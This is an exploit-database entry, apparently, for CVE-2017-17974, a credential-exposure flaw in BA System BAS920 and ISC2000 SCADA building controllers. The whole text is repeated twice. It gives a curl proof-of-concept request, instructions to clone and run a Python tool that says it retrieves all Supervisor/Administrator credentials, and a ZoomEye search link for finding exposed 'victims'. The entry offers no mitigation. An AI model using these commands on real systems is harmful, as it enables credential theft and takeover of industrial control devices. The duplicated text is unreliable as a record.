[*] Exploit Title: "SCADAS "BAS920 & ISC2000"; Credentials Exposed”
[*] CVE: CVE-2017-17974
[*] Date: 29/12/2017
[*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) && Bertin Jose ( @bertinjoseb )
[*] Vendor: BA System
[*] devices(tested): BAS920 & ISC2000
PoC:
curl http://<host>/isc/get_sid_js.aspx
tool
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
usage
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining all credentials for the Supervisor/Administrator account
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
Search Devices vicitms:
https://www.zoomeye.org/searchResult?q=HTTPserv&t=host
https://github.com/ezelf/baCK_system
From : https://www.facebook.com/Ksecureteam/
curl http://<host>/isc/get_sid_js.aspx
tool
usr@pwn:~$ git clone https://github.com/ezelf/baCK_system.git
usr@pwn:~$ cd baCK_system
usage
usr@pwn:~/$ python plinplanplum.py --help
python plinplanplum.py --help
usage: plinplanplum.py [-h] [-v] --host HOST [--port PORT]
[+] Obtaining all credentials for the Supervisor/Administrator account
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] Demo: python plinplanplum.py --host 192.168.1.101 -p 81
Search Devices vicitms:
https://www.zoomeye.org/searchResult?q=HTTPserv&t=host
https://github.com/ezelf/baCK_system
From : https://www.facebook.com/Ksecureteam/